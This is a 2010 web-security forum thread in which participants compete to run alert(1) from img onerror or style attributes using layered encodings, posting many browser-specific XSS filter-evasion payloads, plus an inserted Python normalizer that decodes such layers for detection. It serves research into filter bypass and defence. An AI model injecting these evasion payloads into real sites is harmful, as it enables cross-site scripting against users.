YAUC Encode me baby one more time!
Posted by: Anonymous User
Date: February 11, 2010 10:35AM

Hey all!

Gareth and I were having another fuzzing session today and were thinking about a new contest. It's about time :) So - to not waste any words, here are the rules:

* You have some HTML as a workbench
* To be precise - it's <img onerror="your input" src="x">
* Or <img style="your input" src="x"> in case you prefer - it's up to you!

* The task: Get an alert(1) to be executed
* The problem: You have to use n-times encoded data

* Some examples:
* &#61lert(1) is good
* location='javascript:&#x25;61lert(1)' is better

* You know what we mean? Encode the data as often as possible
* The higher the n in n-times the better
* We have examples with triple and quadruple encoding - can you do more?
* Rules: no unescape(), decodeURI(), decodeURIComponent(), eval() and comparable

The winner will be whoever encoded the data more times than everybody else - or found a way to encode the data n times (n=Infinity)

Here's a full example using double encoding (n=2 - pretty lame but valid):
<img onerror="location='javascript:&#x25;61lert(1)'" src="x">



Edited 5 time(s). Last edit at 02/13/2010 09:54AM by .mario.

Re: YAUC Encode me baby one more time!
Posted by: LeverOne
Date: February 11, 2010 08:35PM

// n = 3
<img onerror="location='javascript:&#92x2561lert(1)'" src="x">

// n = 4
<img src="x" onerror="location='javascript:&#92x255Cu0061lert(1)'">

//IE only, n = 5
<img style="lol:location='javascript:&#92;00005Cx255Cu0061lert(1)',style.lol=null;lo:expression(eval(style.lol))" src="x">

//FF only, n=5
<img src="x" onerror="location.hash='#0=[];&#92x25255Cu0061lert(1)'; location = 'javascript:' + location.hash">

// Opera & IE6, n = 5

<img src=x  onerror="a=this;location='javascript:a.onerror=null,a.src=\'javascript:&#x5Cx255Cx2561lert(1)\';void(0)'">

// IE6 only, n = 6

<img style="background:url('javascript:location='javascript:&#92;0000255Cx255Cu0061lert(1)'');" src="x">

I assume that constructions with "innerHTML" are not allowed?

//FF only, n -> Infinity (url-encoding [25252525])
<img src="x" onerror="try {eval('&#92x252525252525252525255Cu0061lert(1)')} catch(e) {location = 'javascript:' + this.onerror+'; onerror(); '}">

Quote (thornmaker): n = infinity is pretty easy

exactly!


upd: added one encoding (dec html in e4x-string)

// FF only, n = 6

<img src="x" onerror="location.hash='#0=[];&#x5Cx252526#92;u0061lert(1)'; location='javascript:location=<>javascript:'+location.hash+'</>+[];void(0)'">


LeverOne



Edited 5 time(s). Last edit at 03/01/2010 06:58PM by LeverOne.
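A defender-side normalizer for the layering described in the opening post and used in LeverOne's n=3 and n=4 payloads above, added here as an example and not code from the thread: it peels HTML entities, JS string escapes and percent-encoding until the value stops changing, counts the layers, and shows that a filter which decodes each layer only once never sees the alert in the n=4 form. The decoder set, their order and the regexes are my assumptions for a WAF-style normalizer, not a browser-exact model.

```python
import html
import re
from urllib.parse import unquote

# Each decoder undoes one layer a browser strips between an HTML attribute
# value and executed script: HTML entities, JS string escapes (\xHH, \uHHHH)
# and percent-encoding inside a javascript: URL (assumed set and order).
JS_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")

def decode_js_escapes(s):
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

DECODERS = [html.unescape, decode_js_escapes, unquote]

def canonicalize(value, max_rounds=8):
    # Peel layers until the value stops changing; `layers` counts every step
    # that altered it (the thread's n). The round cap stops pathological input
    # from spinning the normalizer.
    layers = 0
    for _ in range(max_rounds):
        before = value
        for decode in DECODERS:
            new = decode(value)
            if new != value:
                layers += 1
                value = new
        if value == before:
            break
    return value, layers

SINK = re.compile(r"\balert\s*\(")

def looks_like_alert(value, single_pass=False):
    # single_pass=True mimics a filter that decodes each layer exactly once.
    if single_pass:
        decoded = value
        for decode in DECODERS:
            decoded = decode(decoded)
    else:
        decoded, _ = canonicalize(value)
    return bool(SINK.search(decoded))

# Constructed attribute values following the n=2, n=3 and n=4 payload shapes
# in the thread (the onerror value exactly as the browser receives it).
SAMPLES = {
    2: "location='javascript:&#x25;61lert(1)'",
    3: "location='javascript:&#92x2561lert(1)'",
    4: "location='javascript:&#92x255Cu0061lert(1)'",
}
```

Calling `canonicalize(SAMPLES[4])` returns the fully decoded value with a layer count of 4, while `looks_like_alert(SAMPLES[4], single_pass=True)` is False because the single pass stops at the `\u0061lert(1)` stage.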

Re: YAUC Encode me baby one more time!
Posted by: thornmaker
Date: February 11, 2010 10:01PM

@leverone haha, nice.

n = infinity is pretty easy with loops and eval....

Re: YAUC Encode me baby one more time!
Posted by: sirdarckcat
Date: February 12, 2010 05:12PM

I think they mean nested encoding.

example:

location='javascript:/<iframe src=data:x;charset=UTF-7;base64,crazy-stuff-here-doing-crazy-stuff-in-html-as-css>/'

so, if I assume correctly, that one would be doing: htmlencoding+encoding inside string+encoding inside regex+encoding as url+encoding as base64+encoding as utf-7+encoding as html+encoding as css+encoding as string=9

then, doing it infinite, is well.. too easy, just repeat 1 encoding and that's it.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: YAUC Encode me baby one more time!
Posted by: Anonymous User
Date: February 13, 2010 09:53AM

Hehe - nice ones LeverOne! And yep - originally we meant to not use the same encoding all over again/eval loops. So the IE6 one is perfectly valid while the last one isn't. Still awesome :)
